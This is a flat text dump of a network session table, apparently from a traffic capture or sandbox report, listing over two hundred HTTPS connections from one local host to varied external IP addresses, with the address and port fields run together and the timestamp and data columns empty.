                                      16766192.168.2.144924218.85.60.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16767192.168.2.145346454.166.218.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16768192.168.2.1452762123.112.239.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16769192.168.2.1452626189.81.11.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16770192.168.2.146033238.228.78.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16771192.168.2.1446432210.178.122.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16772192.168.2.143502813.254.102.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16773192.168.2.1454438135.96.20.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16774192.168.2.1460932189.14.185.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16775192.168.2.1440712167.37.129.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16776192.168.2.1435416108.73.170.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16777192.168.2.144581227.69.96.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16778192.168.2.144312669.209.191.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16779192.168.2.145415470.84.126.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16780192.168.2.1435106205.143.103.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16781192.168.2.144251480.121.84.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16782192.168.2.1457752142.196.148.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16783192.168.2.144026832.77.19.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16784192.168.2.1451528160.59.218.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16785192.168.2.1452350126.72.202.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16786192.168.2.1453630181.218.125.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16787192.168.2.1453228111.215.249.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16788192.168.2.1453530112.231.128.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16789192.168.2.14347109.102.9.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16790192.168.2.144905427.138.97.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16791192.168.2.1442468223.159.117.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16792192.168.2.145349025.50.180.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16793192.168.2.1447420129.111.195.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16794192.168.2.1448468190.65.75.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16795192.168.2.146086042.196.145.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16796192.168.2.1453352114.177.203.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16797192.168.2.145615247.11.72.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16798192.168.2.1458216159.43.164.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16799192.168.2.1450386203.148.236.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16800192.168.2.145211047.121.5.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16801192.168.2.145082276.79.106.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16802192.168.2.1436994144.83.91.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16803192.168.2.143326420.196.51.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16804192.168.2.145198879.134.178.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16805192.168.2.1442000171.32.23.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16806192.168.2.145931061.64.175.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16807192.168.2.1441726181.188.133.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16808192.168.2.144097061.150.69.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16809192.168.2.1447466199.122.155.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16810192.168.2.1435166156.155.9.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16811192.168.2.1445348219.252.42.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16812192.168.2.1459292110.193.62.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16813192.168.2.144489897.65.110.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16814192.168.2.1456130203.8.159.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16815192.168.2.1434800176.220.142.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16816192.168.2.14436681.211.147.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16817192.168.2.143350882.79.89.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16818192.168.2.1432928155.53.28.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16819192.168.2.144944870.52.96.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16820192.168.2.145005079.82.44.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16821192.168.2.1457576133.195.114.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16822192.168.2.1448588204.62.37.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16823192.168.2.143512651.7.126.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16824192.168.2.1453084169.179.180.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16825192.168.2.143795639.230.116.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16826192.168.2.1440818171.160.15.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16827192.168.2.1449894136.142.197.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16828192.168.2.1440214196.198.0.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16829192.168.2.1439386219.135.173.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16830192.168.2.143417264.210.44.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16831192.168.2.1434008223.38.139.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16832192.168.2.1451660163.144.249.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16833192.168.2.145402082.136.196.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16834192.168.2.143325637.140.135.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16835192.168.2.1453368159.178.255.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16836192.168.2.1441096167.254.47.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16837192.168.2.1435698217.149.151.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16838192.168.2.1434132185.117.38.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16839192.168.2.143718693.27.28.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16840192.168.2.1449816146.109.74.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16841192.168.2.145844832.117.24.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16842192.168.2.14606585.165.150.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16843192.168.2.1458952125.64.41.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16844192.168.2.1456054194.240.141.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16845192.168.2.1445196193.154.107.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16846192.168.2.1438746181.150.134.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16847192.168.2.144887861.189.90.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16848192.168.2.145386699.127.41.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16849192.168.2.1434068184.82.17.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16850192.168.2.143450432.71.25.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16851192.168.2.1451726193.192.237.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16852192.168.2.144784070.138.68.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16853192.168.2.1453780108.11.89.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16854192.168.2.1451410111.213.200.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16855192.168.2.1456278217.27.85.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16856192.168.2.1451244144.126.239.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16857192.168.2.145509468.152.68.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16858192.168.2.1436428125.138.44.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16859192.168.2.1460470189.6.198.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16860192.168.2.1436764122.46.205.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16861192.168.2.144193831.39.51.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16862192.168.2.1446830179.193.98.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16863192.168.2.1453858114.197.11.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16864192.168.2.145383287.208.160.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16865192.168.2.1440132123.205.31.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16866192.168.2.146050293.234.32.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16867192.168.2.1448296189.128.195.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16868192.168.2.145900292.52.21.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16869192.168.2.14569161.205.105.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16870192.168.2.144676872.48.96.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16871192.168.2.1454690143.225.128.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16872192.168.2.1446964116.31.228.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16873192.168.2.1447474132.147.111.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16874192.168.2.1438426180.59.158.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16875192.168.2.1450000112.7.116.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16876192.168.2.144948683.141.130.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16877192.168.2.1439010137.137.181.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16878192.168.2.1441278200.56.23.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16879192.168.2.1435142176.58.140.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16880192.168.2.1441030201.150.13.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16881192.168.2.1440918119.126.85.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16882192.168.2.1441130211.237.223.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16883192.168.2.1459036192.68.246.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16884192.168.2.1441488212.93.30.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16885192.168.2.146028278.239.143.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16886192.168.2.1457014204.119.8.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16887192.168.2.14392704.220.170.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16888192.168.2.1457586202.56.129.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16889192.168.2.145888418.227.169.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16890192.168.2.1453902168.178.133.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16891192.168.2.1457328221.139.132.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16892192.168.2.1459720200.165.68.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16893192.168.2.145542494.5.33.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16894192.168.2.1454044205.160.255.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16895192.168.2.1451536175.206.48.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16896192.168.2.1460964179.126.174.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16897192.168.2.1460198164.96.130.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16898192.168.2.144569454.112.141.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16899192.168.2.1440488184.185.191.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16900192.168.2.146017852.211.171.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16901192.168.2.1458238105.135.238.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16902192.168.2.1442266138.56.109.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16903192.168.2.1437094223.68.161.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16904192.168.2.1437810108.192.195.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16905192.168.2.146062664.202.187.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16906192.168.2.144812441.49.93.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16907192.168.2.145100847.199.229.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16908192.168.2.1451040126.131.246.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16909192.168.2.145532825.248.228.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16910192.168.2.144950643.145.111.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16911192.168.2.144501236.58.147.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16912192.168.2.144425843.38.43.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16913192.168.2.1444092133.116.38.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16914192.168.2.144458241.95.229.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16915192.168.2.1452636106.236.216.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16916192.168.2.145428239.166.50.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16917192.168.2.1442626198.88.230.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16918192.168.2.1453422177.233.83.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16919192.168.2.144858036.6.28.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16920192.168.2.145515224.69.229.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16921192.168.2.1445978207.180.111.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16922192.168.2.1446060165.172.174.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16923192.168.2.1451666194.17.76.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16924192.168.2.144024425.118.78.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16925192.168.2.1434562165.118.205.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16926192.168.2.1445512141.149.106.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16927192.168.2.144139290.237.4.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16928192.168.2.145358439.242.139.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16929192.168.2.145025032.160.125.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16930192.168.2.1436890103.115.27.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16931192.168.2.1458896173.80.209.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16932192.168.2.144065040.56.198.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16933192.168.2.143648882.178.131.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16934192.168.2.146046897.155.81.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16935192.168.2.1436902194.224.154.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16936192.168.2.1446174105.164.251.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16937192.168.2.145681060.33.82.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16938192.168.2.1459604192.167.83.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16939192.168.2.144709476.228.215.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16940192.168.2.145705859.241.220.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16941192.168.2.146058886.110.73.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16942192.168.2.1437948218.0.66.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16943192.168.2.1437282218.209.69.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16944192.168.2.145880444.36.192.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16945192.168.2.1434654110.26.98.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16946192.168.2.144859876.78.162.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16947192.168.2.14342764.33.110.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16948192.168.2.144759261.121.164.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16949192.168.2.144576651.117.150.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16950192.168.2.144482648.28.126.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16951192.168.2.1452974117.41.72.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16952192.168.2.1452450158.181.159.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16953192.168.2.144519032.114.142.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16954192.168.2.144783883.254.225.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16955192.168.2.1445602126.43.159.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16956192.168.2.1456482217.38.197.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16957192.168.2.1446644126.193.118.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16958192.168.2.145320454.54.186.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16959192.168.2.1456274207.38.22.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16960192.168.2.1457136216.174.35.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16961192.168.2.1454394220.86.220.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16962192.168.2.145198289.254.180.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16963192.168.2.144335246.130.250.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16964192.168.2.145637084.184.87.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16965192.168.2.1459972192.227.118.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16966192.168.2.1450680108.25.53.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16967192.168.2.1456302200.128.211.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16968192.168.2.145905868.80.165.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16969192.168.2.1441750183.65.116.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16970192.168.2.14458989.161.48.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16971192.168.2.145206698.8.27.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16972192.168.2.1448942139.99.198.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16973192.168.2.1439386137.244.247.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16974192.168.2.1447462162.186.213.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16975192.168.2.143425080.203.249.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16976192.168.2.1459050191.105.65.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16977192.168.2.1443582184.137.195.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16978192.168.2.145098278.68.221.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16979192.168.2.1454500196.173.87.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16980192.168.2.1451182104.95.187.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16981192.168.2.144409047.2.90.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16982192.168.2.1441354174.189.2.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16983192.168.2.144039062.169.182.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16984192.168.2.1458994220.225.34.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16985192.168.2.1442510163.182.85.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16986192.168.2.1442272128.79.253.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16987192.168.2.1443570146.232.25.237443
                                      TimestampBytes transferredDirectionData


